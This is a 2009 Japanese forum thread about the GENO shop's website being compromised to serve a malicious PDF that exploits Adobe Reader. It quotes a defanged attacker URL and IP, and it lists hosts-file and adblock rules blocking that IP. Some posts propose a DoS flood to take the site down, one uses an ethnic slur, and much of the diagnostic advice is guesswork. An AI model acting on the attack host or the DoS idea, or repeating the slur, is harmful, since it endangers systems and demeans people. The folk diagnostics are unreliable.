市民団体(東京都) :2009/04/04(土) 22:58:40.35 ID:lga8JX4L
他人のHP書き換えるとかどうやってんだし
あ、事故解決
235 :
SM-3(catv?) :2009/04/04(土) 22:59:38.80 ID:K0OPDvSV
普通にアクセスできるけど?
236 :
九条(北海道) :2009/04/04(土) 22:59:50.33 ID:yyAfrG7G
きじゃくせいオソロシス
,rュ、__ fヽ、〕 ``丶 、 辷_| `丶、 (_-‐! ヽ、_ _ r'二! ´  ̄ >ー ' ´  ̄  ̄ ー - ._ )-、{ _ __ _ __,z‐マ¬n (_>} ,ィ7丁//////7t-、__ ,r<\ソ^trヘ.} ヽュ,廴.ィ斥r'^ー'⌒ー'⌒ー'⌒ーく/ ハ.__ ,r'こ>'⌒′ ハ、丿 に匁チ‐'".:.:;:.:.:.:;.:.:.:.;': : ;': : : : :└く } }ト、 rく\ 丿 /ーf´ ,ィ夕'".;:;:';:::::;:': : ;:': ::〃::/:: : : :/:::i: : :`y' ∧く.`Y⌒´ ∠^Y //〃.::;:'/;'::::/ : :/::::://:://! ::::::i:!:::|:!:::::::`ーj^ァ_>′ ∠ヽ_ソ `Y!:j .::::i::l:j::,::l: : j :::::jl !:::|l:l:| ::::::i:|:::l:|::::::::i:::(/ h , -o-< ヽ`〈 / /V ヽ l\|:イ .:ト- ヘ .:.ト.:イ|― l:. | ,.ィ _ .ィ'¨i l./! : : :| .:{ムト、|:! !斗≦_|ハ:|l. |::.|__.. イ´ム _j´/_ノー'^Vl,┴j:| ..:. .::|:イ{ィ示ミ「 ` 「イ示ヽト、l!| !´了/´ / j ノ-' /´ ,イ.::A.:.|:.小ト.トィ{::j:} /' トィ{::j::} }小 |__rく´ z′ ´ > - ' ┬ ´ l:..:ト.V!:.:|| 辷ソ ゙辷ソ | r┴‐ァーく あばすとー .小. /l| ヽトzハl:! ''' ′ '''' | `lニ^ーァヘ、 /! !lト i|l.| /.:..八 r======、、 | く⌒ー' `ァ'´.ィヽ . /'|ト._ハ V !|| {:.ィ:.:ト{ヽ. {. ´ ̄ ̄ } .ィ| .:下ミ.、__`¨´_, ト、 / ハ|{ |ハ.Vハ!__ri―く ヽ:| }>`.. ̄ ̄ .´イ/_j .::.::| / ̄|ト、 !! lヽ.__ |||l.| l l !| | ` l l ヽ {ト vミ、工二= ´ /´イ.:.:.:.:! /!!|ハ j ! j lヽ.
238 :
SM-3(大阪府) :2009/04/04(土) 22:59:54.88 ID:ykEIWKbD
洒落にならん カードやら銀行やらその他オンライン関係すっぱ抜かれたかもしれん・・・
240 :
九条(dion軍) :2009/04/04(土) 23:00:05.99 ID:ZsrR7JHv
情報漏えい起こしたパーツ夜はつぶれる 例:pcサクサス 豆知識な
241 :
PAC-3(千葉県) :2009/04/04(土) 23:00:14.91 ID:JZ0oXwSW
>>229 ショッピングサイトのクラッキングならそーいう目的しか考えられないわな。普通。
同じく だって確認したら色々ノートンが遮断したり許可した形跡あったもん でも今はいたって普通。(再起動とIP変更w) とにかく分かり易くまとめてくれ、頼む
ネトゲならいいけど カード・銀行・証券だったらきついよな。
244 :
PAC-3(神奈川県) :2009/04/04(土) 23:01:15.78 ID:GMcr4C4e
とりあえずタスクマネージャで変なプロセス動いてないかチェックしとけよ taskmgr.exeがあったら危険
245 :
遺憾の意(大阪府) :2009/04/04(土) 23:01:15.82 ID:RU5WBf87
ここ送料で評判悪いみたいだけど 小物でも3個かったら送料3個分かかるの? 1個分ですまないのかな
246 :
SM-3(関東・甲信越) :2009/04/04(土) 23:01:49.23 ID:gy44O9nG
規制でPCから書き込み出来ないから辛い このサイト、アクセスしてきた相手の情報ぶっこ抜いてるね
247 :
SM-3(千葉県) :2009/04/04(土) 23:01:50.15 ID:kylTVVAd BE:138312768-2BP(433)
CALMAIN.exeが実行プロセスみたいだな
248 :
SM-3(コネチカット州) :2009/04/04(土) 23:02:04.13 ID:hXp42JWl
最近GENOでクレカ使って買い物した奴は今すぐ止めてもらえ
この文章はjavascriptが含まれていますってのではいをクリックしたらアウアウ?
>>225 conime.exe立ち上がってた((((;゚Д゚))))ガクガクブルブル
251 :
SM-3(千葉県) :2009/04/04(土) 23:03:02.39 ID:kylTVVAd BE:77800493-2BP(433)
252 :
PAC-3(アラバマ州) :2009/04/04(土) 23:03:57.19 ID:pwFZrgnM
wgetしてみた。ヘッダはPDFのファイルだけど47行目からはJavaScriptだ。
253 :
PAC-3(静岡県) :2009/04/04(土) 23:04:10.14 ID:T1ME4NbN
こういうところで詳しそうな人ってカッコいい
tourstart.exe Orun32.exe なにこれ
255 :
SM-3(千葉県) :2009/04/04(土) 23:04:27.41 ID:kylTVVAd BE:60512437-2BP(433)
ていうかGENOってクレカ通らなかったんじゃ無かったか?w
今サイト見られないからうろ覚えな記憶を確認できないが
振込みと代引きしか選択出来なかったような気がする。
lynx使ってる俺には関係のない話っぽい
Acrobatもjavaも最新にしてたらjavaのダイヤログでYesしても大丈夫っぽい (Yesしないほうがいいのは当然だが) ソースは俺
何話してるかわけわかんないけど、俺もいつかはこの会話に混じれるように なりたい。UNIXの閉鎖騒動の時もこうゆう人たちが助けてくれたんだよね(´・ω・`)
なんかHPのソースとか見て詳しく理解できる人がいるみたいなので ちょっとお聞きしたいんですが、今回のこれってGENOのサーバーが セキュリティ的に甘くて、外部から誰かにこういう仕掛けをされたってことになるんですか?
261 :
PAC-3(千葉県) :2009/04/04(土) 23:06:57.93 ID:JZ0oXwSW
Yes/Noは聞かれなかったが、普通聞かれるモンですか?
263 :
SM-3(千葉県) :2009/04/04(土) 23:07:40.88 ID:kylTVVAd BE:46105128-2BP(433)
>>256 自作板かPC一般のスレでクレカ承認おりなくて大正解だったなという書き込みを見た気がするw
ついでにSSL云々も書かれてた様なw
感染してきたけどavast先生もwindowsdefenderも無反応 virustotalでは検知してたのに
顧客なんぞどうでもいいから(購入した事ない) 俺のPCに何したのかが重要だ リカバリやりたくないおー
266 :
SM-3(関東・甲信越) :2009/04/04(土) 23:09:24.64 ID:gy44O9nG
267 :
PAC-3(千葉県) :2009/04/04(土) 23:09:24.66 ID:JZ0oXwSW
>>247 今ファイル検索したけど、そのEXEは居なかったわ。
268 :
九条(埼玉県) :2009/04/04(土) 23:10:07.14 ID:Kpdg05rT
これだからいやなんだ 最悪すぎる 情報抜かれた
>>262 AdobeReaderのjavascriptが切ってあると有効にして良いか聞かれる
270 :
PAC-3(アラバマ州) :2009/04/04(土) 23:11:45.94 ID:Tqe4DIH1
94.247.2.195 hs.2-195.zlkon.lv ってnslookupで出たんだが。 ラトビア共和国のドメインなんだよね、このPC。 $50もするドメインだから、リアルにこの国にあると思うんだけど。
271 :
SM-3(千葉県) :2009/04/04(土) 23:12:03.34 ID:kylTVVAd BE:141194077-2BP(433)
>>260 ○外部からFTPなどを通じてアクセスされた
○設置済のプログラムが悪用できるようになってた(外部からアクセス)
○同じサーバー利用者から、アクセスされた(外部からサーバー経由)
○内部の人が書き換えた(HP製作者など)
○何かのウイルスにひっかかった
色んなことが考えられるな。
vistaだと何も起こらないぞ。 avastも反応なし。
274 :
PAC-3(千葉県) :2009/04/04(土) 23:12:56.78 ID:JZ0oXwSW
>>262 自動的に有効にする設定にしてるなら、アウトじゃ?
かーちゃんのPCのadobeの設定勝手に変えておいて正解だったわ
最悪の場合は何か妙なプログラムを仕込まれて 今後、他の買い物の際の認証情報が筒抜けとかか GENOはクレジット決済をしてないから一切無視で責任取らずってパターン
今感染しているか見分ける方法はあるの? ノートンは無反応みたいだけど。
>>277 Genoがそこだけ修正して
何の発表もしないと、
気付かないままとかありえるから怖いよな。
AntiVirとBitDefenderも非対応とか
>>254 お前余計なモン削除とかしたことないんじゃね?
282 :
PAC-3(アラバマ州) :2009/04/04(土) 23:16:21.80 ID:hhzS2/B7
タスクマネージャーで cmd.exeが立ち上がってないか?
つか鯖に一週間分の自動バックアップあったわ 今日の午前に報告あるから2日位戻せばおkかな? タイムスリップしてくる、じゃ!
284 :
SM-3(島根県) :2009/04/04(土) 23:17:18.08 ID:OfBH11+p
ただひとつ言える事 パソコンを今は買うな時期が悪い
285 :
SM-3(アラバマ州) :2009/04/04(土) 23:17:36.82 ID:EHnj5xKu
おい踏んでしまっただろ・・・
286 :
SM-3(catv?) :2009/04/04(土) 23:17:50.28 ID:lQOOzL5J
avast! v4.8 Pro Acrobat 8.1.4 異常なし!
287 :
SM-3(福岡県) :2009/04/04(土) 23:18:03.09 ID:+nXaajtd
アクセスしてみたけど、タスクマネージャーでcmd起動した記憶がないのに conime.exeがプロセスにある人はマズそうだな パスや個人情報抜かれてるかもne
288 :
九条(dion軍) :2009/04/04(土) 23:18:11.13 ID:ZsrR7JHv
taskmngr cmd coime が立ち上がってるとやばいのか?
tvrock.exeが妙にメモリを使っていて怖いです>< 冗談は置いといて、これが出ていたらアウトっていう決定打はcmd.exe?
290 :
PAC-3(千葉県) :2009/04/04(土) 23:19:00.95 ID:JZ0oXwSW
>>272 邪推するけど、最近やたら自作PC板やハードウェア板なんかでも
genoのサイトのアンカーを張りまくった宣伝レスが不自然に多かったんで、
ある程度組織的にクラッキングしていたのかもしれないね。
この前はν速でもスレが立ってた位だし。↓の。
CPU C2D T7250、 Vista Businessの15.4型NEC製ノートPCが46000円
http://tsushima.2ch.net/test/read.cgi/news/1238662017/ 無論日本人や一応日本語でレスを書けるチョンなんかが犯人なんだと思うけど。
ぶっちゃけ、↑のスレでPC買った奴はマジでヤバいと思う。
踏んでしまった 対処方法を教えてくれ
292 :
市民団体(埼玉県) :2009/04/04(土) 23:19:08.31 ID:WdQ1Why6
293 :
SM-3(石川県) :2009/04/04(土) 23:19:23.32 ID:Ee52QhTN
genoのサイトって元々重いじゃん もしかして前から感染してたとか…? 三日前くらいにアクセスしたんだけど
294 :
SM-3(千葉県) :2009/04/04(土) 23:19:36.37 ID:kylTVVAd BE:121023476-2BP(433)
一番良いのはTrueImageとかでドライブをイメージBackupして
感染したと思われる前にリストアする事だなw
三井住友とかGENOに送金するのに無料だから(ネット口座なら) 三井住友使ってる俺は、結構恐怖感じるぜ…。
296 :
SM-3(福岡県) :2009/04/04(土) 23:20:26.01 ID:+nXaajtd
Ctrl+Alt+Delでタスクマネージャー立ち上げてプロセスの中に conime.exeがあるかどうか確認しろ コマンドプロンプト使ったかどうかも思い出せ
個人情報抜かれてたとしたら諦めとして・・・ウイルススキャンはすぐしないとな
298 :
PAC-3(東日本) :2009/04/04(土) 23:20:33.57 ID:LBWTAiym
>>291 感染して不安な人、いろいろ質問したい人は
/ ̄ ̄ ̄ / /''7 ./''7 / ̄/ /''7
./ ./ ̄/ / /__/ / / ____  ̄ / /
'ー' _/ / ___ノ / /____/ ___ノ /
/___ノ /____,./ /____,./
_ノ ̄/ / ̄/ /''7 / ̄ ̄ ̄/ / ̄/ /'''7'''7
/ ̄ /  ̄ / /  ̄ フ ./ / ゙ー-; ____ / / /._
 ̄/ / ___ノ / __/ (___ / /ー--'゙ /____/ _ノ /i i/ ./
/__/ /____,./ /___,.ノゝ_/ /_/ /__,/ ゝ、__/
が一番(´・ω・) ス
conime.exeがある…怖いですと思ったらlynxコマンドプロンプトからだった… 誰かオススメのプロセスマネージャー教えてくれ、なんか妙に気になる…
俺もちょっくらOSクンニリングスしてくるわ
303 :
SM-3(大阪府) :2009/04/04(土) 23:21:37.51 ID:ykEIWKbD
とりあえず復元いってくる 普段クレカ銀行とか使ってるから終わってるかもしれんけど・・・
>>289 cmd.exeは出なかったな
メモリ使用量が1.7GB増えたけど
俺もリンク張ったことあるわすまん
306 :
九条(埼玉県) :2009/04/04(土) 23:23:02.37 ID:Kpdg05rT
何の反応もないぞ?って偉そうに言ってる人が居ますけど わざわざ「あなた今ウイルスに感染しましたよ」って教えてくれるウイルスなんてあるわけないでしょう? あほですか 警告が出るのはそれなりに対策してる人だからですよ ACRの設定JSOFFにしてあるとか検出率高いAVS入れてあるとか 何の反応もないから安全だとか黙っててくれませんか
307 :
市民団体(アラバマ州) :2009/04/04(土) 23:23:18.51 ID:NFzfjhkD
>>303 被害届けを出したあと、数十時間も放置して被害を広げたとしてgeno訴えてこいよ
firefoxのアドオンnoscriptで geno.co.jp は許可しているけど それ以外は許可してない場合も感染する? 94.247.2.195 はブロックされるのかな?
309 :
SM-3(関西地方) :2009/04/04(土) 23:24:04.72 ID:vCkq7QhB
どっかでbatファイル使ってれば関係ないな
311 :
PAC-3(千葉県) :2009/04/04(土) 23:24:25.57 ID:JZ0oXwSW
>>301 わかんない。
うちはこのスレのリンク先のPC以外にも
ハードウェア板のスレに結構張られてたリンクも踏んでたけど、
今のところ大丈夫っぽい。
結局、PC内にインスコしていたAcrobatReader等のバージョンに左右されちゃうんだと思う。
よくわかんないけど。
312 :
SM-3(福岡県) :2009/04/04(土) 23:24:27.25 ID:+nXaajtd
>>302 今のところの対応としては今使ってるウイルスソフト一旦アンインスコして
カスペかなんか落としてスキャン
あるいは
>>298
でどうしたらいいんだ?物買うときにクレカは使ってないから大丈夫だと思うが
314 :
PAC-3(宮城県) :2009/04/04(土) 23:24:45.75 ID:WyHO9jN2
ラトビアだって踏み台なんじゃないの
315 :
SM-3(千葉県) :2009/04/04(土) 23:25:35.27 ID:kylTVVAd BE:161364678-2BP(433)
>>305 29Kの自作kitはそこそこ安かったからな
まあああいうのは別に態とじゃないともうよ
ν速のDELLパケスレで張られてる分では
○アクセスしたときだけ型 ├ただのブラクラ型 ├盗むのは特定のネトゲのパスだけ型 └パソコンに保存されてる個人情報盗む型 ○アクセスしたあともバックドアが残る型 ├偽のアンチウイルスソフトを買わせるなどのウイルス型 └銀行やクレジットカードを使ったりすると、定期的に送信する型 こんな感じか? どちらも一番下はきついな
特定アジアの犯行の可能性が高い
318 :
SM-3(島根県) :2009/04/04(土) 23:26:22.72 ID:OfBH11+p
ゼロなら
新品 PCスレのせいで踏んでしまったやないか てか毎日のようにGENOみてるから前から抜かれてたかもな
320 :
PAC-3(千葉県) :2009/04/04(土) 23:26:45.13 ID:JZ0oXwSW
conimeはコマンドプロンプトで日本語変換に切り替えると起動して
コマンドプロンプト閉じた後も残る
>>139 によるとトレンドマイクロは対応してるようなので
オンラインスキャンかけてみるとか(オンラインが対応済みかわからんけど)
322 :
市民団体(アラバマ州) :2009/04/04(土) 23:27:29.21 ID:NFzfjhkD
>>316 具体的に何をしているかはすでに解析されてんじゃねぇの?
英語読むのだるいから俺はもう諦めたけど
もしウィルスだとしたら新種かもしれないので、何も反応なしでも実際にはウィルスが発動してるかもしれないよ。 情報漏えい系だとしたら気付かれないように動作するだろうし。 みんな気をつけてね。 基本的にJavaScriptは無効にしておいて、必要のあるときだけ許可とするといいよ。 Firefoxを使ってるならNoScriptがおすすめ。
adblockで */94.247.2.195/* でフィルタかけたらふつうに表示されるようになった
トレンドマイクロのオンラインスキャンどこー?
328 :
九条(北海道) :2009/04/04(土) 23:30:40.37 ID:yyAfrG7G
ここの特価物はJavaScript無効でいけなかったけ?
330 :
市民団体(アラバマ州) :2009/04/04(土) 23:31:06.52 ID:NFzfjhkD
ウイルスに引っかかった臭いやつは、 とりあえず各種ウイルスソフトが対応するまでパケット監視して、怪しいIPをマスクで遮断しとけばいいんじゃねぇの
331 :
市民団体(宮崎県) :2009/04/04(土) 23:31:13.50 ID:4bL4ozLJ
一度もカード使ったことがなくて代引きオンリーなのだが そんな俺でもなんか問題あるのだろうか?
ウイルスかどうかわからんが、やたら重たいのは確か
333 :
九条(チリ) :2009/04/04(土) 23:32:34.18 ID:6m30GvF8
AVGでスキャンしたら特に問題なかったが 怖いお>ω<
334 :
九条(神奈川県) :2009/04/04(土) 23:32:37.42 ID:Z0NkG5TY
ちょっ怖!
テスト
336 :
PAC-3(中部地方) :2009/04/04(土) 23:32:58.45 ID:qLe3J/JQ
niftyのオンラインスキャンがカスペ仕様
338 :
PAC-3(宮城県) :2009/04/04(土) 23:33:09.00 ID:WyHO9jN2
今のうちにGENOの思い出話でもしておくか・・・
339 :
PAC-3(千葉県) :2009/04/04(土) 23:33:26.91 ID:JZ0oXwSW
>>330 一番確実なのは踏んだPCのLAN線を引っこ抜いておく事だわな。
340 :
PAC-3(catv?) :2009/04/04(土) 23:33:32.71 ID:ww/oTYgu
>>331 genoのサイトに住所氏名電話番号メールアドレスが残ってたら
それをごっそり持っていかれたかもしれない
漏洩がなかったかどうか本格的に調査しようとしたらすごい費用かかるから
genoは何もしなさそうだな・・・
342 :
九条(dion軍) :2009/04/04(土) 23:34:55.34 ID:ZsrR7JHv
>326 QRB.pdf, WXk.pdfやらランダムの名前のFile size: 10417 bytesのファイルがダウンされ? 同じくPO.exe, 8lv.exe ...やらFile Size: 15360 Bytesのexeがダウンされる? お前らチェックしろ
>>326 trojan
偽のセキュリティソフトウェアを売りつけるトロイ
またはFTP・電子メール・その他の保存されてるパスワードを変える
って書いてあるのか?よくわかんね
>>340 javascriptに詳しい人も出来ればw
というかお前ら…なんで仮想PCで開かなかったんだよ…
346 :
SM-3(福岡県) :2009/04/04(土) 23:36:50.40 ID:8tAZaojN
ふひぃ なんで今日に限ってgeno行くより先にこのスレに気付いたんだ俺 一生分の運使い切ったな
>>329 genoのソース全てを解析したわけじゃないから確かなことは言えないけど、
>>159 ,207
の件なら大丈夫だと思う
348 :
SM-3(福岡県) :2009/04/04(土) 23:38:03.10 ID:+nXaajtd
TrendMicroもダメっぽいな
ubuntu+火狐で今開いてるが 何ともないぞ
350 :
SM-3(関東・甲信越) :2009/04/04(土) 23:38:17.33 ID:gy44O9nG
葱かPG2でパケ監視して、94.247.2.195をブロックしておけば大丈夫じゃないか。
351 :
PAC-3(宮城県) :2009/04/04(土) 23:38:25.33 ID:WyHO9jN2
普通怖くて開かないだろ・・・CentOSでwgetぐらいしかできん・・・
352 :
SM-3(catv?) :2009/04/04(土) 23:38:31.08 ID:K0OPDvSV
macの俺大勝利!
>>290 それポチった。
まだ振り込んでないが・・
>>347 マジありがと!
いつも買い物するサイトはホワイトリストに入れてるんで心配になった
355 :
市民団体(アラバマ州) :2009/04/04(土) 23:39:30.32 ID:NFzfjhkD
>>342 具体的にどんな情報を持って行ってるか調べるなら、まっさらなPC用意して、わざと引っかかってexeゲットしてから解析か
すんごくだるそうだな
>>329 自分で適当な.js用意して実験すりゃいいじゃん
それ自体はfirefoxの仕様だからfirefoxスレにいけばいいんじゃね
いや激安PCが新しく入ったのかと思って開いたんだよ・・・
こちらのPCを対処する以前に、ここ最近 GENOでなんらかの買い物した人は 情報取られてるわけか。防ぎようがないじゃん。
358 :
市民団体(兵庫県) :2009/04/04(土) 23:40:40.99 ID:c33OQ0/1
こういうのを見ると普段はネットワーク上のノイズだからと気にしないFWのブロックのログが 非常に気になってくるw
adobereader入れてなかったから感染できなかった。 怖い人は %systemroot%\system32\drivers\etc\hosts を開いて 0.0.0.0 94.247.2.195 と書いてからアクセスすればとりあえず安心
361 :
市民団体(宮崎県) :2009/04/04(土) 23:42:16.43 ID:4bL4ozLJ
トレンドのオンラインスキャンが今終わったとこなのだが なにも検出されなかったけど未対応なのかな geno開いたら固まって電源長押しで強制終了したんだけど
362 :
SM-3(福岡県) :2009/04/04(土) 23:42:22.56 ID:8tAZaojN
>>290 のやつ買いそびれて涙目だったけどもしや勝ち組なのか
EWF使ってるからCOMMITしないで再起動。 安全宣言出るまでゲノにはアクセスしない。
364 :
PAC-3(東日本) :2009/04/04(土) 23:43:39.62 ID:zebtisy0
avastが反応しない奴はwebシールドちゃんと設定してるか確認汁
365 :
SM-3(千葉県) :2009/04/04(土) 23:43:43.70 ID:kylTVVAd BE:69156364-2BP(433)
>>357 GENOは大丈夫でしたとか言うだろうけど
只漏れだろうなw
んなわけないか
367 :
SM-3(福岡県) :2009/04/04(土) 23:44:36.30 ID:+nXaajtd
>>361 PAK_Generic.001は、どうもよくわかりません的な意味っぽいw
368 :
PAC-3(千葉県) :2009/04/04(土) 23:45:46.10 ID:JZ0oXwSW
>>342 System32下のtaskman.exeと同サイズだね。15360って。
もしかしてこれかも知れないと思うけど、
一応MSの頒布ファイルだと思うけど。
taskman.exe
CRC32: 3D718590
MD5: 6828047630AD58CA6EEF58C3222D47E7
369 :
SM-3(千葉県) :2009/04/04(土) 23:46:27.72 ID:kylTVVAd BE:161364487-2BP(433)
そもそもがGENOのサイトってSSL効いてたの?という
知らんけどねw
370 :
PAC-3(西日本) :2009/04/04(土) 23:47:54.49 ID:4PABiYiO BE:255897874-PLT(12000)
さっき騙されてDTV板で開いちまったよ。
GENOはクレカ使えないのにクレカクレカ騒いでるやつは馬鹿なの?
372 :
PAC-3(コネチカット州) :2009/04/04(土) 23:48:12.01 ID:2beCeCHN
>>357 > GENOでなんらかの買い物した人は
> 情報取られてるわけか。
俺ここで499円ポケオト買ってしまったのだが
セキュリティソフト入れてても、さらに最新verに更新してても 突破されてる可能性大なのが怖いね。 script切っとけばいい話だが。これは犠牲者多そうだ。
復元しようとしたらブルースクリーンで出来んかったわ ふざけんな
いつでもレタス 全画像読み込み時点でIE8のメモリ使用量が683Mとか行ってるw
376 :
PAC-3(東日本) :2009/04/04(土) 23:49:48.35 ID:zebtisy0
RSSチェック掛けているんだけど、さっきページファイルが云々っていきなり出たと思ったら これが原因か。
378 :
九条(関西地方) :2009/04/04(土) 23:50:39.61 ID:o2MVRaz8
>>326 >when running it load
>hxxp://94.247.2.195/news/?id=10&
>With an Adobe Collab overflow (CVE-2007-5659)
>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659 ここに
>Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods.
とあるからAcrobat 8.1.1以前を使い、なおかつJavaScript Onでアクセスしてたらまずアウト
レタスはすごかった タスクマネージャーが利用できんくなるくらいすごかった
foxit使っててアップデート厨の俺は大丈夫っぽいな
381 :
市民団体(アラバマ州) :2009/04/04(土) 23:52:07.01 ID:NFzfjhkD
>>371 あくまでgeno経由でウイルスかまされてるわけで、
つまり、ウイルスの種類によっちゃ、クレカを他のサイトで使うと持って行かれる可能性もある。
鯖クラックされたのなら、登録情報も漏れた可能性がある訳だよな? 登録時に使ったパスワードと、似たようなパスを登録メールのパスに使ってた奴とかは、 メールのパスを違うパスに変えた方が良さそうだな。 この店、登録時のパス、メールにそのまま書いて返信してきたのにはワロタ パスをハッシュ化して保存してない…とかないよな…?
>>378 それを見る限り、AdobeReaderがインストールされてない環境はそんなに深刻ではないのか?
>>272 thx!
GENOの鯖やセキュリティに問題が多そうですね
あと、HP製作者のヒューマンエラーもありそうなんですね
385 :
SM-3(福岡県) :2009/04/04(土) 23:55:40.51 ID:+nXaajtd
AdobeReaderが入ってない環境だったら大丈夫っぽくないかコレ? バージョンはよくわからんです
386 :
遺憾の意(山陽) :2009/04/04(土) 23:56:18.87 ID:nUYON5kB
〉〉290のやつ買ったが大丈夫なのか? 住所とメアドぐらいだしそこまで気にして無いが、ちゃんとパソコン届けろよ、金振り込んだぞ
カスペのオンラインスキャンおせえ せっかくの機会だしウイルスチェックしようと思ったらこれだよ
>>376 thx
RAIDが原因だった・・・orz
めんどくせぇ
389 :
PAC-3(中部地方) :2009/04/04(土) 23:57:21.67 ID:qLe3J/JQ
390 :
PAC-3(千葉県) :2009/04/04(土) 23:58:28.94 ID:JZ0oXwSW
391 :
SM-3(千葉県) :2009/04/04(土) 23:58:38.25 ID:kylTVVAd BE:60511673-2BP(433)
>>387 オンラインスキャンするならBitDefender(コマンドライン版)使う方が早い
が、このマルウェアには対応してないけどw
393 :
PAC-3(コネチカット州) :2009/04/05(日) 00:00:00.89 ID:YCYjsszN
この間のノートスレで開いちまったじゃねーか 事と次第によっては謝罪と賠償を要求するぞ
394 :
PAC-3(宮城県) :2009/04/05(日) 00:00:08.44 ID:WyHO9jN2
ID:qLe3J/JQ 着々と作戦を進めるなwww
395 :
PAC-3(徳島県) :2009/04/05(日) 00:00:40.10 ID:qBMLTRpS
トレント・ダウン用マシンがひっかかってみたいだ。。。orz conime.exe、常駐してたし。。。 ゲノなんて2度と使わねえよ!!!
>>389 iPhoneからはひらけないが、マジなら最低だな
397 :
PAC-3(東日本) :2009/04/05(日) 00:01:32.09 ID:zebtisy0
>>395 一応アンチウイルスいれとけよww踏み台になるぞっうぇwwww
>>389 geno-webへのリンク
JavaScriptを有効にしたまま踏まないように。
399 :
市民団体(福岡県) :2009/04/05(日) 00:01:56.15 ID:+rl9egCO
去年のサウンドハウスを思い出すな
この瞬間も感染者でてるんだろうな・・・・・・ いつになったら閉鎖するんだよ
402 :
SM-3(アラバマ州) :2009/04/05(日) 00:04:16.77 ID:1OO/7q3C
403 :
SM-3(千葉県) :2009/04/05(日) 00:04:23.71 ID:ilYpXZIZ BE:129667695-2BP(433)
まあでもGENOくらいで良かったんじゃね〜の?w
ワンズとか感染したら何人死人が出るか分からんぞw
>>401 田代で503エラーにするという手もある
が、自分も捕まる諸刃の剣
とりあえずブラウザの設定でjava無効にしときゃいいのか
>>392 わかり難いな
bdコマ版入れてるけど
たまには違うエンジンの奴使いたいんだよってことさね
常駐は余計なもんもアレするから嫌いなんだよな
システムドライブは保護してるし、 USBアプリばかりだから大丈夫だと思っていたら IE8-portableがぶっ壊れてたw まあ丸ごと削除してまた作れば済むから被害は少ないんだけど。
GENOが糞なのは分かった。
411 :
市民団体(福岡県) :2009/04/05(日) 00:06:40.57 ID:+rl9egCO
412 :
SM-3(千葉県) :2009/04/05(日) 00:06:57.25 ID:ilYpXZIZ BE:155601869-2BP(433)
413 :
PAC-3(千葉県) :2009/04/05(日) 00:07:04.60 ID:9Adf0bya
>>403 うん。
まともな奴はgenoなんかから買わないからなw
414 :
PAC-3(関西) :2009/04/05(日) 00:08:00.81 ID:jK/w6bf4
フロッピードライブ蛾 ドルッ! ドルルルルルルルルルッていうた
acrobat reader 7.0だった;;
416 :
九条(アラバマ州) :2009/04/05(日) 00:08:27.98 ID:lcX048f5
>>403 ワンズがきてたら、俺が全力で脂肪してたわ
conime.exeって普通に常駐してるんだろ?ビビらせるなよ・・・
94.247.2.195に繋がらなくすればいいね
これは怖い
>>406 頭いいなおまえさん
しかし世界レベルで展開してるマルウェアじゃ付け焼き刃かもしれん
>>417 コマンドプロンプトが立ち上がらなければ常駐はしないよ
424 :
PAC-3(神奈川県) :2009/04/05(日) 00:11:50.94 ID:1gsBJZYu
genoめちゃめちゃ重いな ウイルス入りなのか
>>418 いきなりおいらのレスを晒してどーすんだよw
感染したか知りたいのだけれどどうすればよい?
427 :
SM-3(アラバマ州) :2009/04/05(日) 00:13:51.02 ID:gwjM9pgQ
adobeが9.10なら大丈夫なの?
この手のウイルスってファイアウォールでパケット完全に遮断しておけば被害はでない? ファイアウォールのパケットフィルターって信用していいのかな?
429 :
九条(アラバマ州) :2009/04/05(日) 00:14:49.18 ID:lcX048f5
foxit+avast+zonealarmの厨房武装最強
431 :
PAC-3(神奈川県) :2009/04/05(日) 00:15:44.46 ID:1gsBJZYu
Antinir使ってるけど感染したみたい
>>427 前のver使ってる人が対応なしで開いてるとほぼOUTなだけで
最新のなら大丈夫だとはいえない。はっきりいって危ないかと。
434 :
PAC-3(徳島県) :2009/04/05(日) 00:16:27.23 ID:qBMLTRpS
こんなめにあってはじめて気づいたわ。 ゲノ糞杉
435 :
PAC-3(神奈川県) :2009/04/05(日) 00:16:29.83 ID:1gsBJZYu
めっちゃおもいAntiVirしね
ノートンにも引っ掛からないようなウイルス忍ばせやがってGENOセキュリティしっかりしろよ。
とりあえずアクロバットリーダー消してみた
adobe readerを突いてるのか 最新版でもだめなら問題だな
439 :
PAC-3(千葉県) :2009/04/05(日) 00:18:43.02 ID:9Adf0bya
>>432 ラウンコ相手には散々戦争したけど、
今時IDすら出ない過疎板相手に戦争しても仕方ないでしょうがw
440 :
SM-3(長屋) :2009/04/05(日) 00:18:55.58 ID:v0YiXEB0
今日の何時からアウトだったのだろうか 午前1時ごろには開いたんだが もともと重いサイトだから分からない
441 :
PAC-3(東日本) :2009/04/05(日) 00:19:02.60 ID:Hok+bv18
あきらめてクリーンインスコしろよw まっさらなのは気持ちいいぞ
心配になってさっきから数十回は開いてるぞ
クリーンインスコはいいな 俺もこの前したけど、大分すっきりした 各種ドライバのインスコが物凄く面倒だったけど
445 :
PAC-3(埼玉県) :2009/04/05(日) 00:20:13.68 ID:MwWpQ7kk
数週間前までは日替わり商品チェックのためにgenoをブラウザ起動した時 自動に開くようにしてたから危なかった…
とりあえず リンク先に田代打って沈めたほうが安全だと思う 誰か企画した方がいいよ
クリーンインストールはソフト消えるの? 全部C以下に入れたから消えるならやらない
448 :
PAC-3(千葉県) :2009/04/05(日) 00:22:05.23 ID:9Adf0bya
>>427 うちはReaderじゃないAcrobat Ext 9.10だったけど、
今のところ異常なしだけど、
うちはgenoのサイトにアクセスしただけでActiveX等の類は一切動作許可しなかったから、
その辺の個々の環境とかオペレーション内容でケースバイケースだと思うんで、
必ずしも大丈夫と油断しないほうがいいと思う。
449 :
市民団体(長屋) :2009/04/05(日) 00:23:11.54 ID:NF3JOGhX
Avira9で無反応
450 :
PAC-3(東日本) :2009/04/05(日) 00:23:25.52 ID:Hok+bv18
よく分からない人はOpera+Avast!の最強伝説にしてまた戻ってこい
451 :
PAC-3(秋田県) :2009/04/05(日) 00:23:44.99 ID:a3zeUutd
452 :
PAC-3(山陽) :2009/04/05(日) 00:24:10.19 ID:SozN4If4
カスペでスキャンしたけどなんにも無いぞ ウイルスとかどうでもいいが、ちゃんとパソコン届くんだろうな?金振り込んだんだぞ
なんでこんなホイホイ踏む奴がいるんだ?
>>428 PDFに何が仕込んであるか分からないけど、自分から拾いに行ってるわけだからだめじゃない?
455 :
SM-3(長屋) :2009/04/05(日) 00:24:50.60 ID:v0YiXEB0
